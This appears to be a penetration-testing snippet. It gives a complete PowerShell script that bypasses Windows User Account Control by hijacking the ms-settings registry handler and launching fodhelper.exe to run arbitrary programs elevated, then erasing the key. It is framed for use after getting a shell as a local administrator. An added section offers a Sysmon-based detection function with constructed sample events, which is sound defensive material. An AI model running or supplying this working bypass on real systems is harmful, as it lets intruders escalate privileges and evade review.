You might pop a shell on a domain user account that is an Administrator on the local computer, but since it's just an interactive shell, you can't run anything with the Administrator tokens/privileges because of UAC.
<#
.SYNOPSIS
    This script is a proof of concept to bypass the User Access Control (UAC) via fodhelper.exe

    It creates a new registry structure in: "HKCU:\Software\Classes\ms-settings\" to perform an UAC bypass to start any application.

    ATTENTION: Do not try this on your productive machine!

.NOTES
    Function   : FodhelperBypass
    File Name  : FodhelperBypass.ps1
    Author     : Christian B. - winscripting.blog

.LINK
    https://github.com/winscripting/UAC-bypass

.EXAMPLE
    Load "cmd.exe /c powershell.exe" (it's default):
    FodhelperBypass

    Load specific application:
    FodhelperBypass -program "cmd.exe"
    FodhelperBypass -program "cmd.exe /c powershell.exe"
#>

function FodhelperBypass(){
    Param (
        [String]$program = "cmd /c start powershell.exe" #default
    )

    #Create registry structure
    New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
    New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
    Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $program -Force

    #Perform the bypass
    Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden

    #Remove registry structure
    Start-Sleep 3
    Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force
}
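Because the script deletes the key three seconds after writing it, a point-in-time registry check will usually miss it; registry event logging is the reliable place to look. The following is an added detection example, not part of the original script: the function name, the event object shape (modelled on Sysmon registry events) and every sample value are assumptions constructed for illustration.

```powershell
# Added example (not from the original script). Event fields follow Sysmon
# registry events: ID 12 = key create/delete, ID 13 = value set.
function Find-MsSettingsHijack {
    param([Parameter(Mandatory)][object[]]$Events)
    # HKCU\Software\Classes is commonly logged as HKU\<SID>_Classes\..., so
    # match the tail of the path instead of a fixed hive prefix.
    $pattern = '(\\Software\\Classes|_Classes)\\ms-settings\\Shell\\Open\\command(\\|$)'
    foreach ($e in $Events) {
        if ($e.TargetObject -notmatch $pattern) { continue }
        $leaf = ($e.TargetObject -split '\\')[-1]   # value name, if any
        $reason = switch ($e.EventType) {
            'CreateKey' { 'handler key created in a per-user hive' }
            'DeleteKey' { 'handler key deleted (the script removes it after 3 s)' }
            'SetValue'  {
                if ($leaf -eq 'DelegateExecute') { 'DelegateExecute value set' }
                else { "handler command set to: $($e.Details)" }
            }
            default     { "other registry activity: $($e.EventType)" }
        }
        [pscustomobject]@{
            UtcTime = $e.UtcTime
            Image   = $e.Image
            Target  = $e.TargetObject
            Reason  = $reason
        }
    }
}

# Constructed sample events (SID, times and the Run entry are made up).
$classes = 'HKU\S-1-5-21-1111111111-2222222222-3333333333-1001_Classes'
$ps      = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
$key     = "$classes\ms-settings\Shell\Open\command"
$sample  = @(
    [pscustomobject]@{ UtcTime = '10:00:00.100'; EventType = 'CreateKey'; Image = $ps
                       TargetObject = $key; Details = '' }
    [pscustomobject]@{ UtcTime = '10:00:00.120'; EventType = 'SetValue'; Image = $ps
                       TargetObject = "$key\DelegateExecute"; Details = '(Empty)' }
    [pscustomobject]@{ UtcTime = '10:00:00.140'; EventType = 'SetValue'; Image = $ps
                       TargetObject = "$key\(Default)"; Details = 'cmd /c start powershell.exe' }
    [pscustomobject]@{ UtcTime = '10:00:01.000'; EventType = 'SetValue'; Image = 'C:\Program Files\App\setup.exe'
                       TargetObject = 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\App'; Details = 'app.exe' }
    [pscustomobject]@{ UtcTime = '10:00:03.300'; EventType = 'DeleteKey'; Image = $ps
                       TargetObject = $key; Details = '' }
)
# Four of the five events are reported; the unrelated Run entry is ignored.
Find-MsSettingsHijack -Events $sample | Format-List
```

On a live host the same function can be fed events read from the `Microsoft-Windows-Sysmon/Operational` log, provided the Sysmon configuration records registry activity under this key.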